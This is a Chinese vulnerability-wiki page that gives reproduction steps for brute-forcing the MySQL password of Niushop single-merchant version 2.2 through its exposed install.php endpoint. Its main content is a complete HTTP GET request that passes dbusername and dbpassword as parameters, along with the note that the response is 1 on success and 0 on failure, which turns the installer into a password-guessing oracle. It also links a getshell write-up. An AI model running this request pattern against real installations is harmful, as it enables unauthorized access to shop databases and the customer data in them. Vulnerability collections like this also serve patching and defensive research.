menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right Niushop chevron_right Niushop 单商户 2.2 爆破MySQL密码.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Niushop 单商户 2.2 爆破MySQL密码.md
    914 B / 2021-04-21 09:23:46
        Niushop 单商户 2.2 爆破MySQL密码
================================

一、漏洞简介
------------

二、漏洞影响
------------

Version:单商户 2.2

三、复现过程
------------

### 安装爆破MySQL密码

    GET /niushop/install.php?action=true&dbserver=127.0.0.1&dbpassword=root2&dbusername=root&dbname=niushop_b2c HTTP/1.1
    Host: 127.0.0.1
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
    Referer: http://127.0.0.1/niushop/install.php?refresh
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: action=db
    Connection: close

![](./resource/Niushop单商户2.2爆破MySQL密码/media/rId25.jpg)

爆破成功返回1,密码错误返回0

参考链接
--------

> https://y4er.com/post/niushop-getshell/
    links
    file_download